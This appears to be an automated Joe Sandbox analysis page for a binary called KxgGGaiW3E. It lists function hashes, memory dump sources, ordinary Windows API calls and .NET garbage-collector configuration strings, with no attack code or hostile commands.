Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: b9993a65d322f5a22c3740859bfbd2a6abde766db8489619dc16308307fcd974
Instruction ID: d91968df4dada3140b54d1b06407709e26b08e9ab03cbefed6cb118b8851d34f
Opcode Fuzzy Hash: b9993a65d322f5a22c3740859bfbd2a6abde766db8489619dc16308307fcd974
Instruction Fuzzy Hash: B9E0EC40E49907C2FBE876667456AB481905F49770F9C9B30DE7E2D3C2ED1CE4A681F4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CCB20 Relevance: 3.0, APIs: 2, Instructions: 18
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF7F30CCB39
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00007FF7F30CAB14), ref: 00007FF7F30CCB4C

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationThread
String ID:
API String ID: 4060959955-0
Opcode ID: a08dc96ef98d388028e25f38437564d77a0777dd0af1ad674e5a25c6522611b5
Instruction ID: 74fd2427668131faf0eeb2c3e279625ebd43643812b082cef355ec62d719910e
Opcode Fuzzy Hash: a08dc96ef98d388028e25f38437564d77a0777dd0af1ad674e5a25c6522611b5
Instruction Fuzzy Hash: FED0C265E0878082DB98FB61AC00025A7D17B98B80FC84039CA0DD7360FE3C82058940

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D1E30 Relevance: 2.6, APIs: 2, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF7F30D1EAE

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 26bb6d4feb826c89409c737ffddf6c17083ef5c9aa542e6c36a30effe3fcae81
Instruction ID: 6f8c2efb3be7920239291be55de5c424f9fc252959a5b3b31be0fb59ceaa30c3
Opcode Fuzzy Hash: 26bb6d4feb826c89409c737ffddf6c17083ef5c9aa542e6c36a30effe3fcae81
Instruction Fuzzy Hash: 1031A132B05A5282EB94EB56E540129A3E1EB45FD0F848136DF6C2BBD5DF38D4638390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D4970 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF7F30D4986
VirtualFree.KERNELBASE ref: 00007FF7F30D499C

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: cef73cd749a1f159d2755f311957df4b2b09bc7e22ac56227996b3c60add0337
Instruction ID: e23cbe6298e99f041bc37ae307b60f8fc5782dba0493555b46d8732d25d7572e
Opcode Fuzzy Hash: cef73cd749a1f159d2755f311957df4b2b09bc7e22ac56227996b3c60add0337
Instruction Fuzzy Hash: 03E0CD28F1510182FB58A713684151456517F49700FC48039C51D9A3D0DE2DD11A8B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D94FE Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF7F30D9544

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 585c5b0283a90edc90468c7499508650e9e86f0c92a5e4ea8080d39df2a08525
Instruction ID: 66c3af8632d6752029a2c3aedeabfff257506152569c2d799f345fb3be4d14e1
Opcode Fuzzy Hash: 585c5b0283a90edc90468c7499508650e9e86f0c92a5e4ea8080d39df2a08525
Instruction Fuzzy Hash: 14419662F0864682F790EA1194415B5A3D2EB45BA4F840237DE7D7B7C9CF3CE941C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F31C5180 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF7F31C50DE), ref: 00007FF7F31C51D2

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a6d5c86e64202f0eb83e28acb21147d4e68d51560377b954ed1e0c19f1170f57
Instruction ID: 0d4fd3af66843f83c91faa4ad1fd0222dedf1b981a7ccd62559ebcbba3ad2ad7
Opcode Fuzzy Hash: a6d5c86e64202f0eb83e28acb21147d4e68d51560377b954ed1e0c19f1170f57
Instruction Fuzzy Hash: 6B21D322E0D81589F7A1F662AD021FD92A16F547D8F900136DD6D3F6C6CE2CA88382E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CB590 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

EventRegister.ADVAPI32(?,?,?,00007FF7F30C56FF), ref: 00007FF7F30CB5E1

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: EventRegister
String ID:
API String ID: 3840811365-0
Opcode ID: 18c339118df192ad297b3813eab2b31c94cf903426b60caa6dee84bd45be11cf
Instruction ID: b8410b8485ef03e144a652b793ce023098cabc02c67c87409739450611e0c712
Opcode Fuzzy Hash: 18c339118df192ad297b3813eab2b31c94cf903426b60caa6dee84bd45be11cf
Instruction Fuzzy Hash: 1721D660A08A0B96EBC1FF25E8411A4B7A1EF44744FC0407AC92D6F2E1DE3DA549C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30C6180 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F30CC7E0: GetCurrentThreadId.KERNEL32 ref: 00007FF7F30CC7E4

Part of subcall function 00007FF7F30CC3A0: VirtualQuery.KERNEL32 ref: 00007FF7F30CC3D2

RaiseFailFastException.KERNEL32 ref: 00007FF7F30C61F7

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
API String ID: 2131581837-0
Opcode ID: 5530f064360d37136eda02febe4a1ac6cea05fa9d1a81b8b647b041ec2c41d9a
Instruction ID: c95502cd06e834aae418fb2b1271b47d66c59cd49edab10817c1761701a5d8ff
Opcode Fuzzy Hash: 5530f064360d37136eda02febe4a1ac6cea05fa9d1a81b8b647b041ec2c41d9a
Instruction Fuzzy Hash: FD01C472B08B4292DB88FB61B5016E9F3A1FB053C0F84413AEB6D1B782DF38E0258750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7F30D4CD0 Relevance: 113.0, Strings: 90, Instructions: 532COMMON

Download Yara Rule

Strings

System.GC.ConserveMemory, xrefs: 00007FF7F30D556F
BGCFLkd, xrefs: 00007FF7F30D531D
BGCSpinCount, xrefs: 00007FF7F30D4EEC
BreakOnOOM, xrefs: 00007FF7F30D4D9F
BGCFLEnableKd, xrefs: 00007FF7F30D53EF
Gen0Size, xrefs: 00007FF7F30D4F4A
System.GC.LargePages, xrefs: 00007FF7F30D4E78
LogFile, xrefs: 00007FF7F30D51D9
LOHThreshold, xrefs: 00007FF7F30D4ECE
ServerGC, xrefs: 00007FF7F30D4CFA
System.GC.HeapHardLimitPercent, xrefs: 00007FF7F30D5129
BGCFLGradualD, xrefs: 00007FF7F30D5377
GCHighMemPercent, xrefs: 00007FF7F30D507C
GCEnableSpecialRegions, xrefs: 00007FF7F30D51A5
System.GC.HeapHardLimitPOH, xrefs: 00007FF7F30D54C9
HeapVerifyLevel, xrefs: 00007FF7F30D4E92
GCSpinCountUnit, xrefs: 00007FF7F30D55FC
BGCFLEnableFF, xrefs: 00007FF7F30D5449
GCConfigLogFile, xrefs: 00007FF7F30D520C
GCLargePages, xrefs: 00007FF7F30D4E82
System.GC.Name, xrefs: 00007FF7F30D55B2, 00007FF7F30D55CA
GCHeapHardLimitPOHPercent, xrefs: 00007FF7F30D553E
System.GC.HeapAffinitizeRanges, xrefs: 00007FF7F30D5020, 00007FF7F30D5041
GCRegionSize, xrefs: 00007FF7F30D5187
GCEnabledInstructionSets, xrefs: 00007FF7F30D5551
System.GC.HeapCount, xrefs: 00007FF7F30D4F28
HeapCount, xrefs: 00007FF7F30D4F37
LOHCompactionMode, xrefs: 00007FF7F30D4EB0
GCCpuGroup, xrefs: 00007FF7F30D4E5A
System.GC.CpuGroup, xrefs: 00007FF7F30D4E48
GCHeapHardLimitPercent, xrefs: 00007FF7F30D5138
System.GC.Server, xrefs: 00007FF7F30D4CEB
System.GC.HeapHardLimitSOH, xrefs: 00007FF7F30D5485
RetainVM, xrefs: 00007FF7F30D4D8C
GCGen0MaxBudget, xrefs: 00007FF7F30D50AD
GCLowSkipRatio, xrefs: 00007FF7F30D50E9
CompactRatio, xrefs: 00007FF7F30D4FE0
BGCSpin, xrefs: 00007FF7F30D4F0A
BGCFLEnableKi, xrefs: 00007FF7F30D53D1
System.GC.HeapAffinitizeMask, xrefs: 00007FF7F30D4FFE
LogEnabled, xrefs: 00007FF7F30D4DE5
GCNumaAware, xrefs: 00007FF7F30D4E27
GCHeapHardLimitLOH, xrefs: 00007FF7F30D54B6
BGCFLEnableTBH, xrefs: 00007FF7F30D542B
BGCFLTuningEnabled, xrefs: 00007FF7F30D524B
BGCFLkp, xrefs: 00007FF7F30D52E1
GCName, xrefs: 00007FF7F30D55B9, 00007FF7F30D55DC
System.GC.HighMemoryPercent, xrefs: 00007FF7F30D506D
GCHeapHardLimitPOH, xrefs: 00007FF7F30D54D8
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF7F30D5515
GCConserveMem, xrefs: 00007FF7F30D557E
GCProvModeStress, xrefs: 00007FF7F30D508F
ForceCompact, xrefs: 00007FF7F30D4D59
BGCG2RatioStep, xrefs: 00007FF7F30D5467
BGCFLSmoothFactor, xrefs: 00007FF7F30D5359
LatencyMode, xrefs: 00007FF7F30D4F86
System.GC.Concurrent, xrefs: 00007FF7F30D4D13
BGCFLSweepGoalLOH, xrefs: 00007FF7F30D52C3
GCRegionRange, xrefs: 00007FF7F30D5169
ConservativeGC, xrefs: 00007FF7F30D4D38
GCHeapAffinitizeRanges, xrefs: 00007FF7F30D502C, 00007FF7F30D504D
BGCMLki, xrefs: 00007FF7F30D53B3
ConfigLogEnabled, xrefs: 00007FF7F30D4E06
NoAffinitize, xrefs: 00007FF7F30D4DD2
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF7F30D54EB
ConfigLogFile, xrefs: 00007FF7F30D521D
GCGen1MaxBudget, xrefs: 00007FF7F30D50CB, 00007FF7F30D514B
LogFileSize, xrefs: 00007FF7F30D4FC2
System.GC.HeapHardLimit, xrefs: 00007FF7F30D5107
System.GC.NoAffinitize, xrefs: 00007FF7F30D4DC0
System.GC.HeapHardLimitLOH, xrefs: 00007FF7F30D54A7
GCWriteBarrier, xrefs: 00007FF7F30D5591
BGCFLff, xrefs: 00007FF7F30D533B
System.GC.RetainVM, xrefs: 00007FF7F30D4D7A
GCHeapHardLimitLOHPercent, xrefs: 00007FF7F30D551F
BGCFLki, xrefs: 00007FF7F30D52FF
BGCMemGoal, xrefs: 00007FF7F30D5269
GCHeapHardLimit, xrefs: 00007FF7F30D5116
BGCFLSweepGoal, xrefs: 00007FF7F30D52A5
LatencyLevel, xrefs: 00007FF7F30D4FA4
GCHeapAffinitizeMask, xrefs: 00007FF7F30D500D
GCLogFile, xrefs: 00007FF7F30D51C8
BGCFLEnableSmooth, xrefs: 00007FF7F30D540D
BGCMemGoalSlack, xrefs: 00007FF7F30D5287
SegmentSize, xrefs: 00007FF7F30D4F68
ConcurrentGC, xrefs: 00007FF7F30D4D25
GCHeapHardLimitSOHPercent, xrefs: 00007FF7F30D54FA
GCHeapHardLimitSOH, xrefs: 00007FF7F30D5494
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF7F30D552F
BGCMLkp, xrefs: 00007FF7F30D53A0

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
API String ID: 0-2278931206
Opcode ID: 0b3610bf5b87f1b255f8e477043d71e08543d8efaa6116ec78db8eac80a4d796
Instruction ID: ab55a4ee84fc54e9d1403b7bc5f74f77115788073c74ab39514bd7cadc8aa286
Opcode Fuzzy Hash: 0b3610bf5b87f1b255f8e477043d71e08543d8efaa6116ec78db8eac80a4d796
Instruction Fuzzy Hash: 61326061608A5B83FBE0EB15F910AA9AB61FF457C8FC11137D99C1BBA4DF2CD2018794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D5980 Relevance: 104.0, Strings: 83, Instructions: 274COMMON

Download Yara Rule

Strings

System.GC.ConserveMemory, xrefs: 00007FF7F30D5F3E
BGCFLkd, xrefs: 00007FF7F30D5D93
BGCSpinCount, xrefs: 00007FF7F30D5B2E
GCLatencyLevel, xrefs: 00007FF7F30D5BB1
gcForceCompact, xrefs: 00007FF7F30D59E8
BGCFLEnableKd, xrefs: 00007FF7F30D5E26
GCLatencyMode, xrefs: 00007FF7F30D5B9C
System.GC.LargePages, xrefs: 00007FF7F30D5ACD
System.GC.HeapHardLimitPercent, xrefs: 00007FF7F30D5C90
BGCFLGradualD, xrefs: 00007FF7F30D5DD2
GCHighMemPercent, xrefs: 00007FF7F30D5C0F
GCEnableSpecialRegions, xrefs: 00007FF7F30D5CEB
System.GC.HeapHardLimitPOH, xrefs: 00007FF7F30D5EC1
GCSpinCountUnit, xrefs: 00007FF7F30D5F6F
BGCFLEnableFF, xrefs: 00007FF7F30D5E65
GCHeapCount, xrefs: 00007FF7F30D5B5D
GCLOHCompact, xrefs: 00007FF7F30D5B04
GCLargePages, xrefs: 00007FF7F30D5AD4
GCHeapHardLimitPOHPercent, xrefs: 00007FF7F30D5F16
GCRegionSize, xrefs: 00007FF7F30D5CD6
GCEnabledInstructionSets, xrefs: 00007FF7F30D5F2B
System.GC.HeapCount, xrefs: 00007FF7F30D5B56
GCCpuGroup, xrefs: 00007FF7F30D5AB4
System.GC.CpuGroup, xrefs: 00007FF7F30D5AAD
GCHeapHardLimitPercent, xrefs: 00007FF7F30D5C97
System.GC.Server, xrefs: 00007FF7F30D598B
GCLogEnabled, xrefs: 00007FF7F30D5A5E
System.GC.HeapHardLimitSOH, xrefs: 00007FF7F30D5E8D
GCConserveMemory, xrefs: 00007FF7F30D5F45
GCConfigLogEnabled, xrefs: 00007FF7F30D5A79
GCSegmentSize, xrefs: 00007FF7F30D5B87
GCGen0MaxBudget, xrefs: 00007FF7F30D5C39
GCLowSkipRatio, xrefs: 00007FF7F30D5C63
BGCSpin, xrefs: 00007FF7F30D5B43
gcConservative, xrefs: 00007FF7F30D59CD
BGCFLEnableKi, xrefs: 00007FF7F30D5E11
System.GC.HeapAffinitizeMask, xrefs: 00007FF7F30D5BEE
GCNumaAware, xrefs: 00007FF7F30D5A94
gcServer, xrefs: 00007FF7F30D5992
GCHeapHardLimitLOH, xrefs: 00007FF7F30D5EAE
BGCFLEnableTBH, xrefs: 00007FF7F30D5E50
BGCFLTuningEnabled, xrefs: 00007FF7F30D5D00
BGCFLkp, xrefs: 00007FF7F30D5D69
System.GC.HighMemoryPercent, xrefs: 00007FF7F30D5C08
GCHeapHardLimitPOH, xrefs: 00007FF7F30D5EC8
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF7F30D5EF5
GCProvModeStress, xrefs: 00007FF7F30D5C24
BGCG2RatioStep, xrefs: 00007FF7F30D5E7A
BGCFLSmoothFactor, xrefs: 00007FF7F30D5DBD
System.GC.Concurrent, xrefs: 00007FF7F30D59AB
BGCFLSweepGoalLOH, xrefs: 00007FF7F30D5D54
GCRegionRange, xrefs: 00007FF7F30D5CC1
BGCMLki, xrefs: 00007FF7F30D5DFC
gcConcurrent, xrefs: 00007FF7F30D59B2
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF7F30D5EDB
GCgen0size, xrefs: 00007FF7F30D5B72
GCGen1MaxBudget, xrefs: 00007FF7F30D5C4E
GCCompactRatio, xrefs: 00007FF7F30D5BDB
System.GC.HeapHardLimit, xrefs: 00007FF7F30D5C76
System.GC.NoAffinitize, xrefs: 00007FF7F30D5A3C
GCLogFileSize, xrefs: 00007FF7F30D5BC6
System.GC.HeapHardLimitLOH, xrefs: 00007FF7F30D5EA7
GCWriteBarrier, xrefs: 00007FF7F30D5F5A
BGCFLff, xrefs: 00007FF7F30D5DA8
System.GC.RetainVM, xrefs: 00007FF7F30D5A01
GCHeapHardLimitLOHPercent, xrefs: 00007FF7F30D5EFC
BGCFLki, xrefs: 00007FF7F30D5D7E
GCTotalPhysicalMemory, xrefs: 00007FF7F30D5CAC
